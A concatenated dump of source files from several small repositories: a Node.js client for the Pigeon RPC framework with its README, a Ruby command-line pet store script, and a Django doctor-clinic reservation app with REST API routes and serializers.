/** Decode a response body with the configured serializer. May throw. */
Serializer.prototype.deserialize = function deserialize(body) {
  return this.serializer.deserialize(body);
};
/** Resolve the serializer module for the configured `serialize` option. */
function whichSerializer(config) {
  var serialize = config.get('serialize');
  switch(serialize) {
    case 'hessian' : return hessian;
    case 'json'    : return json;
    case 'protobuf': return protobuf;
    default:
      logger.fatal('Unsupported serialize: %j.', serialize);
  }
}
module.exports = Serializer;
<file_sep>'use strict';
require('rootpath');
var hessian = require('lib/serializer/hessian/');
/*
*
* Constants.
*
*/
var SERIALIZE_ID = 2
, URL_FIELD = 'serviceName'
, RESULT_FIELD = 'returnVal'
;
function serialize(body) {
body = {
$class: 'com.dianping.dpsf.protocol.DefaultRequest',
$: body
};
try {
return hessian.encode(body, '2.0');
}
catch(err) {
throw err;
}
}
function deserialize(body) {
try {
return hessian.decode(body, '2.0');
}
catch(err) {
throw err;
}
}
module.exports = {
SERIALIZE_ID: SERIALIZE_ID,
URL_FIELD : URL_FIELD,
RESULT_FIELD: RESULT_FIELD,
serialize : serialize,
deserialize : deserialize
};
<file_sep>'use strict';
require('rootpath')();
var _ = require('underscore')
, parser = require('properties-parser')
, logger = require('lib/logger')('config')
;
/*
*
* Constants.
*
*/
var ENV_PATH = '/data/webapps/appenv'
, TIMEOUT = 2000
, RETRIES = 1
, PROTOCOLS = ['http']
, SERIALIZES = ['hessian']
, LOADBALANCES = ['autoaware', 'roundRobin', 'random']
;
/*
*
* Globals.
*
*/
var g_zkserver = [];
// Read the default zookeeper address from the environment file once at load.
(function init() {
  var properties;
  try {
    properties = parser.read(ENV_PATH);
  }
  catch(err) {
    // Bug fix: on a read failure `properties` stayed undefined and the
    // lookup below threw a TypeError. Warn and keep the empty default.
    logger.warn('Reading `appenv` error: %j.', err);
    return;
  }
  if (!properties['zkserver']) {
    return logger.warn('No zookeeper address supplied in `appenv`.');
  }
  g_zkserver = properties['zkserver'];
}());
/**
 * Normalized view over the caller's service options; every supported option
 * is validated through config() with the caller's value (possibly undefined).
 */
function Config(configs) {
  configs = configs || {};
  var names = ['zkserver', 'timeout', 'retries', 'protocol', 'serialize', 'loadBalance'];
  var self = this;
  names.forEach(function(name) {
    self[name] = config(name, configs[name]);
  });
}
/** Read a normalized option by name. */
Config.prototype.get = function(name) {
  return this[name];
};
/**
 * Validate/normalize one option value, falling back to module defaults.
 * Unsupported enum values are fatal (process exits via logger.fatal); an
 * unknown option name only logs a warning and yields undefined.
 */
function config(name, value) {
switch(name) {
case 'zkserver':
// Fall back to the address read from /data/webapps/appenv at load time.
if (!value) {
value = g_zkserver;
}
if (value) {
return value;
} else {
logger.fatal('No zookeeper address supplied.');
}
break;
case 'timeout':
return value || TIMEOUT;
case 'retries':
return value || RETRIES;
case 'protocol':
if (!value) {
return PROTOCOLS[0];
}
if (_.contains(PROTOCOLS, value)) {
return value;
}
logger.fatal('Unsupported %s: %j.', name, value);
break;
case 'serialize':
if (!value) {
return SERIALIZES[0];
}
if (_.contains(SERIALIZES, value)) {
return value;
}
logger.fatal('Unsupported %s: %j.', name, value);
break;
case 'loadBalance':
if (!value) {
return LOADBALANCES[0];
}
if (_.contains(LOADBALANCES, value)) {
return value;
}
logger.fatal('Unsupported %s: %j.', name, value);
break;
default:
logger.warn('Unsupported config :%s.', name);
}
}
module.exports = Config;
<file_sep>'use strict';
require('rootpath')();
/*
*
* Constants.
*
*/
// Marker prefix tagging hostports that speak the HTTP protocol.
var PROTOCOL_PREFIX = '@HTTP@';
module.exports = {
  PROTOCOL_PREFIX: PROTOCOL_PREFIX
};
<file_sep># node-pigeon-client
This module is designed to resemble the Pigeon Java client API but with tweaks to follow the conventions of Node.js modules. Developers who are familiar with the Pigeon Java client should be able to pick it up quickly.
This module has been tested to work with Pigeon version 2.3.10.
## Getting Started
1. Install node.
2. Install node-pigeon-client using npm:
``` bash
$ npm install node-pigeon-client --save
```
3. An environment configuration file `/data/webapps/appenv` should be provided in the given format
```
deployenv = qa # Environment.
zkserver = 127.0.0.1:2181 # Zookeeper host and port.
```
## Example
Remote service "EchoService":
```java
public class EchoService {
public int hello(int a) {
return a;
}
}
```
Call the remote service "EchoService":
```javascript
var pigeon = require('node-pigeon-client');
var java = require('node-pigeon-client').java;
var url = 'EchoService'; // Remote service url.
pigeon.getService(url, function(err, service) {
if (err) {
return console.log('Get remote service error: %s.', err);
}
service.hello(java.int(123456), function(err, result) {
if (err) {
return console.log('Call remote service method error: %s.', err);
}
// Output 123456 to the console.
console.log('Remote service method result: %d.', result);
});
});
```
## Documentation
#### getService(url, [options], callback)
Retrieve the service of the given url.
**Arguments**
* url `String` - The service url.
* options `Object` - An object to set the service retrieval options. Currently
available options are:
  * `zkserver`: Comma-separated `host:port` pairs, each representing a Zookeeper
server. e.g.
```javascript
'127.0.0.1:2181, 127.0.0.1:2182, 127.0.0.1:2183'
```
* `timeout` Remote service method call timeout in milliseconds.
* `protocol` Protocol of remote service method call.
  * `serialize` Serialization format for network transmission.
* `timeoutRetry` Whether to retry when timeout.
* `retries` The number of retry attempts for timeout.
* `loadBalance` Type of remote service server load balance.
Default options:
```javascript
{
  zkserver    : '127.0.0.1:2181', // Can also be set in '/data/webapps/appenv'.
  timeout     : 2000,
  protocol    : 'http',           // http.
  serialize   : 'hessian',        // hessian.
  timeoutRetry: true,             // true/false.
  retries     : 1,
  loadBalance : 'autoaware'       // autoaware/roundRobin/random.
}
```
* callback(err, service) `Function` - The callback function. The `service` can
be regarded as an object containing all the service methods that can be
called.
## Java Types Supported
* null
* int
* long
* double
* boolean
* java.lang.Integer
* java.lang.Long
* java.lang.Double
* java.lang.Boolean
* java.lang.String
* java.lang.Object
* java.util.List
* java.util.Set
* java.util.Date
* array
* user-defined
#### java.null()
**Example**
```java
Object a = null;
```
```javascript
var a = java.null()
```
#### java.int(jsNumber)
**Example**
```java
int a = 123;
```
```javascript
var a = java.int(123);
```
#### java.long(jsNumber)
**Example**
```java
long a = 123;
```
```javascript
var a = java.long(123);
```
#### java.double(jsNumber)
**Example**
```java
double a = 1.23;
```
```javascript
var a = java.double(1.23);
```
#### java.boolean(jsBoolean)
**Example**
```java
boolean a = true;
```
```javascript
var a = java.boolean(true);
```
#### java.Integer(jsNumber)
**Example**
```java
java.lang.Integer a = new java.lang.Integer(123);
```
```javascript
var a = java.Integer(123);
```
#### java.Long(jsNumber)
**Example**
```java
java.lang.Long a = new java.lang.Long(123);
```
```javascript
var a = java.Long(123);
```
#### java.Double(jsNumber)
**Example**
```java
java.lang.Double a = new java.lang.Double(1.23);
```
```javascript
var a = java.Double(1.23);
```
#### java.Boolean(jsBoolean)
**Example**
```java
java.lang.Boolean a = new java.lang.Boolean(true);
```
```javascript
var a = java.Boolean(true);
```
#### java.String(jsString)
**Example**
```java
java.lang.String a = new java.lang.String('123');
```
```javascript
var a = java.String('123');
```
#### java.Object(jsObject)
**Example**
```java
public class Car {
private String name;
private int money;
private ArrayList<Integer> wheelSize = new ArrayList<Integer>();
public Car(name, money, wheelSize) {
this.name = name;
this.money = money;
this.wheelSize = wheelSize;
}
}
java.lang.Object a = new Car("Benz", 123, new ArrayList([1, 2, 3, 4]));
```
```javascript
var a = java.Object({
name : java.String('Benz'),
money : java.int(123),
wheelSize: java.List.Integer([1, 2, 3, 4])
});
```
#### java.List.Generics(jsArray)
`Generics` represents the following types:
* int
* long
* double
* boolean
* java.lang.Integer
* java.lang.Long
* java.lang.Double
* java.lang.Boolean
* java.lang.String
* java.lang.Object
* java.util.Date
* user-defined
**Example**
```java
List<String> a = new ArrayList(["a", "b", "c"]);
```
```javascript
var a = java.List.String(['a', 'b', 'c']);
```
#### java.Set.Generics(jsArray)
See java.List.Generics(jsArray).
#### java.array.Generics(jsArray)
See java.List.Generics(jsArray).
#### java.Date(jsDate)
**Example**
```java
java.util.Date a = new java.util.Date();
```
```javascript
var a = java.Date(new Date());
```
#### java.Class(classname, jsObject)
**Example**
```java
package packagename;
public class Car {
private String name;
private int money;
private ArrayList<Integer> wheelSize = new ArrayList<Integer>();
public Car(name, money, wheelSize) {
this.name = name;
this.money = money;
this.wheelSize = wheelSize;
}
}
packagename.Car a = new packagename.Car("Benz", 123, new ArrayList([1, 2, 3, 4]));
```
```javascript
var a = java.Class('packagename.Car', {
name : java.String('Benz'),
money : java.int(123),
wheelSize: java.List.Integer([1, 2, 3, 4])
})
```
<file_sep>'use strict';
require('rootpath')();
var util = require('util');
function Error(type) {
this.type = type;
this.info = util.format.apply(util, Array.prototype.slice.call(arguments, 1));
}
module.exports = Error;
<file_sep>'use strict';
/**
* HttpConnector.
* This module is designed to make http post request to the server for network
* probe or remote service call.
*
* Module relationship:
* Connector = HttpConnector || TcpConnector
*/
require('rootpath')();
var _ = require('underscore')
, request = require('request')
, Error = require('lib/error')
, logger = require('lib/logger')('httpConnector')
, serializer = require('lib/serializer/')
;
// An HTTP transport bound to one service descriptor; `service` supplies
// the url, serializer and configs used for every request.
function HttpConnector(service) {
  this.service = service;
}
/**
 * Dispatch on arity: four arguments perform a remote procedure call;
 * two arguments perform a reachability probe, in which case `method`
 * actually carries the probe callback.
 */
HttpConnector.prototype.connect =
function connect(hostport, method, params, cb) {
  if (arguments.length === 4) {
    rpcConnect(this, hostport, method, params, cb);
  } else {
    probeConnect(this, hostport, method);
  }
};
/**
 * Perform one remote procedure call over HTTP POST: serialize the
 * request, send it, then deserialize and classify the response.
 * Errors are reported to `cb` as typed Error values ('Serialization',
 * 'Network', 'Server', 'Deserialization'); on success cb(null, result).
 */
function rpcConnect(context, hostport, method, params, cb) {
  var service = context.service
    , codec   = service.serializer
    ;
  logger.debug('RPC connection: service(%s), hostport(%s), method(%s)' +
    ', params(%j).', service.url, hostport, method, params);

  // Assemble the wire-level request envelope.
  var payload = {
    serialize : codec.SERIALIZE_ID,
    methodName: method,
    parameters: params
  };
  payload[codec.URL_FIELD] = service.url;

  try {
    payload = codec.serialize(payload);
  }
  catch(err) {
    // RAW ERROR!
    return _.defer(function() { cb(new Error('Serialization', err)); });
  }

  var options = {
    uri     : 'http://' + hostport + '/service?serialize='
      + codec.SERIALIZE_ID,
    encoding: null,
    timeout : service.configs.get('timeout'),
    body    : payload
  };
  logger.debug('RPC connection: service(%s), request options(%j).',
    service.url, options);

  request.post(options, function(err, response, raw) {
    if (err) {
      // RAW ERROR!
      return cb(new Error('Network', err));
    }
    if (response.statusCode !== 200) {
      // RAW ERROR!
      return cb(new Error('Server', 'Status code: %d', response.statusCode));
    }

    var decoded;
    try {
      decoded = codec.deserialize(raw);
    }
    catch(err) {
      // RAW ERROR!
      return cb(new Error('Deserialization', err));
    }

    // A result carrying a `message` field is the server's way of
    // reporting an application-level failure.
    var result = decoded[codec.RESULT_FIELD];
    if (result && result['message']) {
      // RAW ERROR!
      return cb(new Error('Server', result['message']));
    }
    cb(null, result);
  });
}
/**
 * Probe a server's reachability by issuing a bare POST to its service
 * endpoint. The callback receives a typed Error for network/server
 * failures and no arguments on success.
 */
function probeConnect(context, hostport, cb) {
  logger.debug('Probe connection: service(%s), hostport(%s).',
    context.service.url, hostport);

  var options = {
    uri     : 'http://' + hostport + '/service?serialize='
      + context.service.serializer.SERIALIZE_ID,
    encoding: null,
    timeout : context.service.configs.get('timeout')
  };
  logger.debug('Probe connection: service(%s), hostport(%s).',
    context.service.url, hostport);

  request.post(options, function(err, response) {
    if (err) {
      // RAW ERROR!
      return cb(new Error('Network', err));
    }
    if (response.statusCode !== 200) {
      // RAW ERROR!
      return cb(new Error('Server', 'Status code: %d', response.statusCode));
    }
    // Fixed: signal success. Previously the callback was never invoked
    // on a 200 response, so callers such as Prober's async.each waited
    // for `eachdone` forever.
    cb();
  });
}

module.exports = HttpConnector;
<file_sep>'use strict';
/**
* Prober.
* This module is designed to probe the network connection between Pigeon
* server and client. The prober will be triggered if the service router
* finds too little available server IPs.
*
* Module relationships:
* Router ---> Prober
*/
require('rootpath')();
var _ = require('underscore')
, async = require('async')
, logger = require('lib/logger')('prober')
;
// Binds a Prober to its owning service descriptor, giving it access to
// the service's router and connector.
function Prober(service) {
  this.service = service;
}
/**
 * Probe every candidate server reported by the router, marking each IP's
 * reachability (0 = unreachable, 1 = reachable) in the router status.
 *
 * @param done Optional callback invoked when all probes have finished.
 */
Prober.prototype.probe = function probe(done) {
  logger.debug('Probe: start probe, router status(%j), service(%s).',
    this.service.router.status, this.service.url);

  var that = this;
  async.each(
    this.service.router.probes(),
    function(ip, eachdone) {
      that.service.connector.connect(ip, function(err) {
        // Fixed: `err` is absent on a successful probe — guard before
        // reading `.type`, which previously threw a TypeError.
        that.service.router.status[ip].reachability
          = (err && _.isEqual(err.type, 'Network')) ? 0 : 1;
        eachdone();
      });
    },
    function() {
      logger.debug('Probe: end probe, router status(%j), service(%s).',
        that.service.router.status, that.service.url);
      done && done();
    }
  );
};

module.exports = Prober;
<file_sep>'use strict';
require('rootpath')();
var _ = require('underscore');
function next(router) {
var nexts = router.nexts();
return _.isEmpty(nexts) ? null : _.sample(_.pairs(nexts))[0];
}
module.exports = {
next: next
};
<file_sep>'use strict';
/**
* Connector.
* This module is designed to make request to the server for network probe or
* remote service call.
*
* Module relationships:
* (Prober, Reflector) ---> Connector ---> Serializer
*/
require('rootpath')();
var logger = require('lib/logger')
, TcpConnector = require('lib/connector/tcp')
, HttpConnector = require('lib/connector/http')
;
/**
 * Facade over the protocol-specific transports. Selects the concrete
 * connector implementation once, based on the configured protocol.
 */
function Connector(service) {
  this.service = service;
  var Transport = whichConnector(service.configs);
  this.connector = new Transport(service);
}
/**
 * Forward to the underlying transport, preserving arity: four arguments
 * make a remote procedure call; two arguments make a network probe (in
 * which case `method` carries the probe callback).
 */
Connector.prototype.connect
= function connect(hostport, method, params, cb) {
  if (arguments.length === 4) {
    this.connector.connect(hostport, method, params, cb);
  } else {
    this.connector.connect(hostport, method);
  }
};
/**
 * Map the configured protocol name onto a connector constructor.
 * NOTE(review): `logger` in this module is the raw module export — it is
 * not invoked with a tag as in sibling files; confirm `logger.fatal`
 * exists on the uninvoked module.
 */
function whichConnector(configs) {
  var protocol = configs.get('protocol');
  if (protocol === 'tcp') {
    return TcpConnector;
  }
  if (protocol === 'http') {
    return HttpConnector;
  }
  logger.fatal('Unsupported protocol: %j.', protocol);
}

module.exports = Connector;
<file_sep>'use strict';
/**
* Reflector.
* This module is designed to reflect the remote service procedure call.
* All the remote service method call to the Pigeon server is wrapped here.
*
* Module relationships:
* Proxy ---> Reflector ---> Connector
*/
require('rootpath')();
var _ = require('underscore')
, async = require('async')
, Error = require('lib/error')
, logger = require('lib/logger')('reflect')
, type = require('lib/util/type')
;
// Binds a Reflector to its owning service descriptor; the descriptor
// supplies the router, connector and configs used by reflect().
function Reflector(service) {
  this.service = service;
}
/**
 * Build a proxy function for the remote `method`. The returned function
 * accepts the method's parameters followed by a node-style callback, and
 * drives retry/failover around the connector.
 */
Reflector.prototype.reflect = function reflect(method) {
  logger.debug('Reflect: service(%s), method(%s).',
    this.service.url, method);

  var that = this;
  return function() {
    // The last argument is the user callback; everything before it is a
    // method parameter.
    var params = _.initial(arguments)
      , cb = _.last (arguments)
      ;
    logger.debug('RPC: start RPC, service(%s), method(%s), params(%j).',
      that.service.url, method, params);

    // Callback checking.
    if (!cb || !_.isFunction(cb)) {
      // FATAL ERR!
      // NOTE(review): execution continues after logger.fatal — presumably
      // fatal aborts the process; confirm, otherwise `cb` is used below.
      logger.fatal('Fatal error: A callback must be provided as the last ' +
        'argument in service(%s) method(%s).',that.service.url, method);
    }

    // Parameter checking: type.check returns a truthy descriptor for an
    // invalid parameter.
    var errparam = _.find(params, function(param) {
      return type.check(param) ? true : false;
    });
    if (errparam) {
      _.defer(function() {
        // TOP ERROR!
        // NOTE(review): the callback receives the formatted message
        // string (toperr.info), not the Error object — confirm callers
        // expect a string here.
        var toperr = new Error('top', 'Parameter error(%s), service(%s), ' +
          'method(%s), params(%j).', type.check(errparam).info, that.service.url, method, params);
        logger.error(toperr.info);
        cb(toperr.info);
      });
      return;
    }

    // Retry loop: `retries` counts attempts left; invoking `whilstdone`
    // with a truthy value stops async.whilst.
    var retries = that.service.configs.get('retries');
    async.whilst(
      function() {
        return retries-- >= 0;
      },
      function(whilstdone) {
        // Pick the next server according to the load-balance strategy.
        var ip = that.service.router.next();
        if (!ip) {
          _.defer(function() {
            // TOP ERROR!
            var toperr = new Error('top', 'Network error(%s), ' +
              'service(%s), method(%s), params(%j).', 'No available servers',
              that.service.url, method, params);
            logger.error(toperr.info);
            cb(toperr.info);
            whilstdone(1);
          });
        } else {
          that.service.connector.connect(ip, method, params, function(err, result) {
            if (err && err.type === 'Network') {
              // Mark this server unreachable and retry on another one,
              // unless attempts are exhausted.
              that.service.router.status[ip].reachability = 0;
              if (retries < 0) {
                // TOP ERROR!
                var toperr = new Error('top', 'Network error(%s), ' +
                  'service(%s), method(%s), params(%j).', err.info, that.service.url,
                  method, params);
                logger.error(toperr.info);
                cb(toperr.info);
                return whilstdone(1);
              }
              return whilstdone();
            }
            // Any response — even an application-level error — proves the
            // server is reachable.
            that.service.router.status[ip].reachability = 1;
            if (err) {
              // TOP ERROR!
              var toperr = new Error('top', '%s error(%s), service(%s), method(%s), ' +
                'params(%j).', err.type, err.info, that.service.url, method, params);
              logger.error(toperr.info);
              cb(toperr.info);
              return whilstdone(1);
            }
            // Success: deliver the result and stop the retry loop.
            cb(err, result);
            return whilstdone(1);
          });
        }
      },
      function() {
        logger.debug('RPC: end RPC, service(%s), method(%s), params(%j).',
          that.service.url, method, params);
      }
    );
  };
};

module.exports = Reflector;
| c1706564bb6ad9bcbc889375588c46cef83f5ac0 | [
"JavaScript",
"Markdown"
] | 15 | JavaScript | lixt/node-pigeon-client | e1ffe58c8ba1696f66f440a5d4dc9ced82ad3e8a | aea824c85cf1262fbb23e68392e72aaadae60b58 |
refs/heads/master | <file_sep>
@pets =[
{key:1, name: "Dog", price:10},
{key:2, name: "Cat", price:30},
{key:3, name: "Bird", price:20}
]
@options = [
{key:1, name: "View Pets"},
{key:2, name: "add Pet to cart"},
{key:3, name: "View Cart"},
{key:4, name: "Checkout"},
{key:5, name: "Remove Item"},
{key:6, name: "add pets to store"}
]
@cart =[]
def display_options
@options.each_with_index do | option, index|
puts " #{option[:key]}, #{option[:name]}"
end
end
def view_pets
@pets.each_with_index do | pet, index|
puts "#{pet[:key]}, Type:#{pet[:name]}, $#{pet[:price]}"
end
end
def add_pets
basket = {}
puts "What would you like to add?"
view_pets
selection = gets.chomp.to_i
basket[:name] = @pets[selection -1][:name]
basket[:price] = @pets[selection -1][:price]
@cart << basket
puts " You are getting #{basket}"
end
def adding_to_pets
puts "What do you want the name to be?"
new_name = gets.chomp
puts "What do you want the price to be?"
new_price = gets.chomp.to_i
new_pet ={
key: @pets.length + 1,
name:new_name,
price:new_price,
}
@pets << new_pet
end
def view_cart
@cart.each_with_index do | item, index|
puts "#{item[:name]}, #{item[:price]}"
end
end
def checkout
total = 0
@cart.each do |item|
total += item[:price].to_i
end
puts "the total is #{total}"
end
def remove_item
puts " What would you like to remove?"
delete_item = gets.chomp.to_i
@cart.delete_at(delete_item -1)
view_cart
end
def display_menu
puts "What would you like to do?"
display_options
choice = gets.chomp.to_i
case choice
when 1
view_pets
display_menu
when 2
add_pets
display_menu
when 3
view_cart
display_menu
when 4
view_cart
checkout
when 5
view_cart
remove_item
display_menu
when 6
adding_to_pets
display_menu
else
puts"good bye"
end
end
display_menu
<file_sep>
@animals = [
{key: 1 name:'cat', age: 10},
{key: 2 name: 'dog',age: 10},
{key: 3 name: 'bird',age: 10}
]
def display_animals
@animals.each_with_index do | animal, index|
puts "Name #{animal[:name]} Age #{animal[:age]}"
end
end
def add_animal(name, age)
animal = {
name: "#{name}",
age: "#{age}",
}
@animals << animal
end
def delete_animal
display_animals
puts " What aninmal would you like to delete?"
index = gets.chomp.to_i
puts "Are you sure?"
del_answer = gets.chomp
if del_answer == "y"
puts "delete #{index}"
@animals.delete_at(index)
else del_answer
menu_promp
end
end
def edit_name(index)
puts 'What name do you want to change?'
new_name = gets.chomp #1
@animals[index + 1][:name]=new_name
end
def edit_animal
display_animals
puts " What aninmal name would you like to change?"
index = gets.chomp.to_i
edit_name(index)
end
def menu_promp
puts " Start What would you like to do?"
answer = gets.chomp.to_i
case answer
when 1
puts "Whats the animals Name"
name = gets.chomp
puts "Whats the animals Age"
age = gets.chomp.to_i
add_animal(name,age)
menu_promp
when 2
display_animals
menu_promp
when 3
edit_animal
menu_promp
when 4
delete_animal
menu_promp
end
end
def menu_items
menu_promp
end
menu_items<file_sep>require "review"
vet | c115f595833c7e8206e71b7ebe8860d8772a7941 | [
"Ruby"
] | 3 | Ruby | sjohnston92/pt_pet_store | 43e66fb8438cc49f1020a7cf3270f0a858a40cfc | a620cdc80949b102f8d945ad08ca11abfad0ab6f |
refs/heads/master | <repo_name>marcoszillig/ouichefs<file_sep>/java/.metadata/version.ini
#Fri Sep 16 14:11:46 BRT 2016
org.eclipse.core.runtime=2
org.eclipse.platform=4.6.0.v20160606-1100
<file_sep>/java/Web_OuiChefs/src/br/com/ouichefs/beans/PratoPedido.java
package br.com.ouichefs.beans;
public class PratoPedido {
}
<file_sep>/java/Web_OuiChefs/src/br/com/ouichefs/beans/Orcamento.java
package br.com.ouichefs.beans;
public class Orcamento {
int vl_orcamento_pessoa;
String dt_validade_orcamento;
String dt_fechamento_orcamento;
public Orcamento(int vl_orcamento_pessoa, String dt_validade_orcamento, String dt_fechamento_orcamento) {
super();
this.vl_orcamento_pessoa = vl_orcamento_pessoa;
this.dt_validade_orcamento = dt_validade_orcamento;
this.dt_fechamento_orcamento = dt_fechamento_orcamento;
}
public Orcamento() {
super();
}
public int getVl_orcamento_pessoa() {
return vl_orcamento_pessoa;
}
public void setVl_orcamento_pessoa(int vl_orcamento_pessoa) {
this.vl_orcamento_pessoa = vl_orcamento_pessoa;
}
public String getDt_validade_orcamento() {
return dt_validade_orcamento;
}
public void setDt_validade_orcamento(String dt_validade_orcamento) {
this.dt_validade_orcamento = dt_validade_orcamento;
}
public String getDt_fechamento_orcamento() {
return dt_fechamento_orcamento;
}
public void setDt_fechamento_orcamento(String dt_fechamento_orcamento) {
this.dt_fechamento_orcamento = dt_fechamento_orcamento;
}
}
| d3cde68e243efc52ff6c3fccbc7ece70362334be | [
"Java",
"INI"
] | 3 | INI | marcoszillig/ouichefs | 52412a5ddfd6726f352096bdc23dec54f99b421f | dd790ab538391ea117c04436ab174043feb1649a |
refs/heads/main | <repo_name>Aca84/Picturinho<file_sep>/resources/js/app.js
require('./bootstrap');
includes('main.js');<file_sep>/resources/js/main.js
//do no why I make this file duno<file_sep>/app/Http/Controllers/PostsController.php
<?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Models\Post;
use App\Models\User;
use Illuminate\Support\Facades\Auth;
use Illuminate\Support\Facades\Storage;
use Illuminate\Support\Facades\File;
class PostsController extends Controller
{
/**
* Create a new controller instance.
*
* @return void
*/
public function __construct()
{
$this->middleware('auth', ['except'=>['index','show','search']]);
}
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function index()
{
// $user = auth()->user()->name; // User name for naming the image folder
$posts = Post::latest()->paginate(30); // This will return last created post on top
return view('posts.index')->with('posts', $posts);
}
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function search(Request $request)
{
// $request->validate(
// ['search'=>'required|min:1']
// );
$search = $request->input('searchQuery');
$posts = Post::where('title', 'like', "%$search%")->get();
return view('search')->with('posts', $posts);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create()
{
return view('posts.create');
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
$this->validate($request, [
'title' => 'required',
'body' => 'required',
// 'image' => 'image|nullable|mimes:jpeg,png,jpg,gif,svg|max:2048'
'image' => 'nullable|mimes:jpeg,png,jpg,gif,svg|max:2048'
]);
$user = auth()->user()->name; // User name for naming the image folder
// Check if request has image in form
if ($request->hasFile('image')) {
// Working upload shorter
$fileNameToStore = $request->file('image')->getClientOriginalName();
// $path = $request->file('image')->storeAs('public/images', $fileNameToStore); // All images in one folder
$path = $request->file('image')->storeAs('public/images/'.$user, $fileNameToStore); // For every user create user(name) folder
}else{
$fileNameToStore = 'noimage.jpg';
}
// Create post
$post = new Post;
$post->title = $request->input('title');
$post->body = $request->input('body');
$post->user_id = auth()->user()->id;
$post->image = $fileNameToStore;
$post->save();
return redirect('/posts')->with('success', 'You have successfully crated a post.');
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show($id)
{
$posts = Post::find($id);
return view('posts.show')->with('posts',$posts);
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
$posts = Post::find($id);
// Check admin auth
// if (Auth::user()->role == 'admin') {
// return view('posts/edit')->with('posts',$posts);
// }
// Check for correct user
if(Auth::user()->id !== $posts->user_id && Auth::user()->role !== 'admin'){
return redirect('/posts')->with('error', 'Nije moguce');
}
return view('posts/edit')->with('posts',$posts);
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request, $id)
{
$this->validate($request, [
'title' => 'required',
'body' => 'required',
'image' => 'nullable|mimes:jpeg,png,jpg,gif,svg|max:2048'
]);
// Check if request has image in form
$user = auth()->user()->name; // What user it is
if ($request->hasFile('image')) {
$fileNameToStore = $request->file('image')->getClientOriginalName();
$path = $request->file('image')->storeAs('public/images/'.$user, $fileNameToStore);
}
// Update post
$post = Post::find($id);
$post->title = $request->input('title');
$post->body = $request->input('body');
if ($request->hasFile('image')) {
$post->image = $fileNameToStore;
}
$post->save();
return redirect('/posts')->with('success', 'Updated!');
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
// $post = Post::find($id);
$post = Post::findOrFail($id);
// Check for correct user
if(Auth::user()->id !== $post->user_id){
return redirect('/posts')->with('error', 'Nije moguce');
}
// Delete image from folder
$user = auth()->user()->name;
// $img = $post['image'];
if ($post->image != 'noimage.jpg') {
// Storage::delete('public/images/'.$post->image); // Working if img is in images folder
Storage::delete('public/images/'.$user.'/'.$post->image); // This is working like charm, deleting img from user folder
}
$post->delete();
return redirect('/posts')->with('success','You have successfully deleted a post.');
}
}
<file_sep>/README.md
# Picturinho
Blog with text and pictures
| 0a8f5baaf72f3e3c712e9efcacffe117f9f5f77a | [
"JavaScript",
"Markdown",
"PHP"
] | 4 | JavaScript | Aca84/Picturinho | 858f4381228a01f29fda53f573ba3dc5765dc785 | 572c22473f848c725f17f77cc8328e5a50bcb148 |
refs/heads/master | <file_sep>from django.contrib.auth.models import AbstractUser, BaseUserManager
from django.db import models
from django.utils.translation import gettext_lazy as _
class User(AbstractUser):
# enum for django instead of tuple choices
class Types(models.TextChoices):
DOCTOR = "DOCTOR", "Doctor"
PATIENT = "PATIENT", "Patient"
base_type = Types.PATIENT
type = models.CharField(_("Type"), max_length=50, choices=Types.choices, default=base_type)
class DoctorManager(BaseUserManager):
def get_queryset(self, *args, **kwargs):
return super().get_queryset(*args, **kwargs).filter(type=User.Types.DOCTOR)
class Doctor(User):
base_type = User.Types.DOCTOR
objects = DoctorManager()
class Meta:
proxy = True
@property
def get_doctor_clincs(self):
return Clinic.objects.filter(doctor=self)
def save(self, *args, **kwargs):
if not self.pk:
self.type = User.Types.DOCTOR
return super().save(*args, **kwargs)
class Clinic(models.Model):
doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE)
name = models.CharField(max_length=15)
price = models.DecimalField(decimal_places=2, max_digits=4)
date = models.DateTimeField(null=True)
start_time = models.TimeField(null=True)
end_time = models.TimeField(null=True)
def __str__(self):
return self.name
class PatientManager(BaseUserManager):
def get_queryset(self, *args, **kwargs):
return super().get_queryset(*args, **kwargs).filter(type=User.Types.PATIENT)
class Patient(User):
base_type = User.Types.PATIENT
objects = PatientManager()
class Meta:
proxy = True
def save(self, *args, **kwargs):
if not self.pk:
self.type = User.Types.PATIENT
return super().save(*args, **kwargs)
class Reservation(models.Model):
patient = models.ForeignKey(Patient, on_delete=models.CASCADE)
clinic = models.ForeignKey(Clinic, on_delete=models.CASCADE)
def __str__(self):
return self.pk
<file_sep># Doctor-Clinic
complete the task, include testing
1. pip install -r requirements.txt
2. makemigrations ,and migrate
3. py manage.py runserver
<file_sep>from django.contrib import admin
from .models import *
admin.site.register(Doctor)
admin.site.register(User)
admin.site.register(Patient)
admin.site.register(Clinic)
admin.site.register(Reservation)
<file_sep>from django.urls import path
from .views import *
app_name = "api"
urlpatterns = [
path("", api, name="home"),
# register
path("register/", RegisterUser.as_view(), name="resgister"),
# create reservation
path("reservation/", MakeReservation.as_view(), name="make_reservation"),
# list reservation for doctors or patient
path("patient-appointment/<int:pk>/", ShowPatientReservation.as_view(), name="patient_reservations"),
path("doctor-appointment/<int:pk>/", ShowDoctorAppointmnet.as_view(), name="doctor_reservations"),
# list all reservation on the system
path("show-reservation/", ListReservation.as_view(), name="list_reservations"),
# update reservation
path("manage-reservation/<int:pk>/", ReservationUpdate.as_view(), name="reservation_update"),
# delete reservation
path("delete-reservation/<int:pk>/", ReservationDelete.as_view(), name="reservation_delete"),
]
<file_sep>from core.models import *
from rest_framework import serializers
class RegisterSerlizer(serializers.ModelSerializer):
class Meta:
model = User
fields = ["username", "email", "type", "password"]
class ReservationSerializer(serializers.ModelSerializer):
class Meta:
model = Reservation
fields = ["patient", "clinic"]
<file_sep>from django.shortcuts import render
from .models import *
def home(request):
